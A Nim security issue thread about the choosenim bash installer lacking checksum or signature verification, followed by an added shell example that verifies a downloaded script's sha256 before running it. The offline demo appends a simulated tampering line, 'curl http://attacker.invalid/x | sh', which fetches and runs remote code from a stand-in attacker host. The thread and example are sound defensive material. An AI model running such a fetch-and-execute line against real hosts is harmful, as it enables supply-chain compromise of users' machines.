nim-lang / security

Embargoed security issues that will be made public after a fix is made available. Use https://github.com/nim-lang/security/security

Choosenim bootstrap installation process using bash is not secure #3

Closed dom96 closed 3 years ago

dom96 commented 3 years ago

Sent to security@nim-lang.org from research@nightwatchcybersecurity.com:

The bootstrap installation process using a bash script is not entirely secure - no PGP signature is published and there is no way to check the download is legit: https://nim-lang.org/install_unix.html https://nim-lang.org/choosenim/init.sh

This can lead to supply chain attacks such as the one that just happened here: https://about.codecov.io/security-update/

A checksum and a way to verify it should be provided, and security information should be added to the webpage referenced above. Ideally this should be done via PGP.

Thanks

dom96 commented 3 years ago

Immediate thought: how does rustup handle this?

alaviss commented 3 years ago

Sign the script and/or publish the checksum somewhere trustworthy, similar to what we do with our binary releases.

Any form of validation would have to be done by the user since if we automate it there's no reason why an attacker can't just remove the verification code.

dom96 commented 3 years ago

Cool, easy fix then. I will try to do that ASAP.

dom96 commented 3 years ago

FWIW I don't actually see rustup offering anything like this: https://rustup.rs/. But to be consistent with the sha256 sums we have for Nim releases, I will create one for this script.

dom96 commented 3 years ago

https://nim-lang.org/choosenim/init.sh.sha256 now exists
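The user-side check that alaviss describes, applied to a script and a companion `.sha256` file like the one dom96 published. This is an added example, not code from the Nim project or the choosenim installer. It assumes the checksum file is in `sha256sum` format (`<hex>  init.sh`, first field taken, so a bare hex digest also works) and that both files have already been downloaded; the `demo` function builds constructed files in a temporary directory so it runs offline, with no network access.

```shell
#!/bin/sh
# Added example: verify a downloaded bootstrap script against its published
# .sha256 file BEFORE handing it to a shell. Not the Nim project's own code.
# Assumptions: the checksum file has sha256sum format ("<hex>  init.sh"), and
# both init.sh and init.sh.sha256 were fetched beforehand (e.g. with curl -O).

# SHA-256 of a file, portable across GNU coreutils and BSD/macOS userlands.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Return 0 when the script's digest equals the one in the checksum file, else 1.
# Reads only the first field of the first line, lower-cased, so both
# "<hex>  init.sh" and a bare "<hex>" file are accepted. A missing or empty
# checksum file fails closed.
verify_script() {
    script="$1"; sumfile="$2"
    expected=$(head -n1 "$sumfile" 2>/dev/null | awk '{print $1}' | tr 'A-F' 'a-f')
    actual=$(sha256_of "$script")
    [ -n "$expected" ] && [ "$expected" = "$actual" ]
}

# The safe replacement for `curl ... | sh`: execute only after verification.
verify_and_run() {
    if verify_script "$1" "$2"; then
        sh "$1"
    else
        echo "checksum mismatch for $1; refusing to run" >&2
        return 1
    fi
}

# Constructed demo (no network): a fake init.sh with a genuine checksum file,
# then the same script with a tampered line appended. Prints "<good> <bad>",
# where 1 means verification passed. Expected: "1 0".
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "installing"\n' > "$d/init.sh"
    printf '%s  init.sh\n' "$(sha256_of "$d/init.sh")" > "$d/init.sh.sha256"
    verify_script "$d/init.sh" "$d/init.sh.sha256" && good=1 || good=0
    # Simulated supply-chain tampering of the served script.
    printf 'curl http://attacker.invalid/x | sh\n' >> "$d/init.sh"
    verify_script "$d/init.sh" "$d/init.sh.sha256" && bad=1 || bad=0
    rm -rf "$d"
    echo "$good $bad"
}

demo
```

As alaviss notes, the comparison has to happen in the user's own shell, not inside the script: code that verifies itself can simply be edited out by whoever replaced the script. A checksum served from the same host as the script also only catches corruption or a partial compromise; if the same server is serving both files, an attacker who replaces one can replace the other, which is why the report asks for a PGP signature or for the digest to be published somewhere the attacker does not control.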